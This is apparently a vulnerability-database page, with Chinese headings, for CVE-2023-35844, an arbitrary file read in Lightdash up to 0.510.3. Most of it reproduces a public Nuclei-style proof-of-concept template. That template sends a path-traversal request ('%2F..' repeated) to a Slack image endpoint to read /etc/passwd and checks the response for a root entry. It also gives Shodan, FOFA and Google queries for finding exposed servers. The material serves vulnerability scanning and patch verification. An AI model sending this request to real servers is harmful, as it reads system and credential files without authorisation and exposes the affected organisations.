CVE-2023-35844: Lightdash version <= 0.510.3 Arbitrary File Read

日期: 2025-08-01 | 影响软件: Lightdash | POC: 已公开

漏洞描述

packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used.

PoC代码[已公开]

id: CVE-2023-35844

info:
  name: Lightdash version <= 0.510.3 Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: |
    packages/backend/src/routers in Lightdash before 0.510.3
    has insecure file endpoints, e.g., they allow .. directory
    traversal and do not ensure that an intended file extension
    (.csv or .png) is used.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
  remediation: |
    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
  reference:
    - https://advisory.dw1.io/59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c
    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3
    - https://github.com/lightdash/lightdash/pull/5090
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-35844
    cwe-id: CWE-22
    epss-score: 0.91047
    epss-percentile: 0.99624
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lightdash
    product: lightdash
    shodan-query:
      - title:"Lightdash"
      - http.title:"lightdash"
    fofa-query: title="lightdash"
    google-query: intitle:"lightdash"
  tags: cve,cve2023,lightdash,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100840458c37b831f933d281345f1b4bc0d399da1cb77f5f0fa10d07763ed8acc0a0221008fc1dac4ad3d8db6bccc636a065ee513a72b397d28c53c2fce6270206f4f6cbb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐